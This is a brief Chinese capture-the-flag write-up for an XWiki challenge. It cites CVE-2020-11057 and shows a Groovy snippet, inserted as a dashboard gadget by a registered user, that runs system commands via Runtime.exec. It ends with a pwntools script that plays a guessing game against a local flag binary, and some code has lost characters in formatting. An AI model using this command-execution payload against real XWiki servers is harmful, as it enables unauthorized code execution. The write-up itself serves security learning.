GACTF之XWiki

华盟原创文章投稿奖励计划

文章来源:EDI安全

01

地址

https://jira.xwiki.org/browse/XWIKI-16960https://nvd.nist.gov/vuln/detail/CVE-2020-11057

02

审计

注册一个用户登录在后台dashboard添加gadget

r = Runtime.getRuntime()proc = r.exec('dir /');BufferedReader stdInput1 = new BufferedReader(new InputStreamReader(proc.getInputStream()));String s1 = null;while ((s1 = stdInput1.readLine()) != null) { print s1; }

GACTF之XWiki

03

获取根目录文件

GACTF之XWiki

04

解码

发现readflag使用base64编码拿出文件

GACTF之XWiki

05

结果

活脱脱一个小游戏 懒得看算法了

from pwn import *import recontext.log_level = 'DEBUG'io = process("./readflag")flag = ""for i in range(464): io.recvuntil("bigger?") s = io.recvuntil("n") t = re.findall("(d.*) : (d.*)",s)[0] print(t) if int(t[0])>int(t[1]): io.sendline("0") flag += "0" else: io.sendline("1")        flag += "1"io.close()# io.interactive()print(flag)

GACTF之XWiki

GACTF之XWiki

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/269211.html

发表评论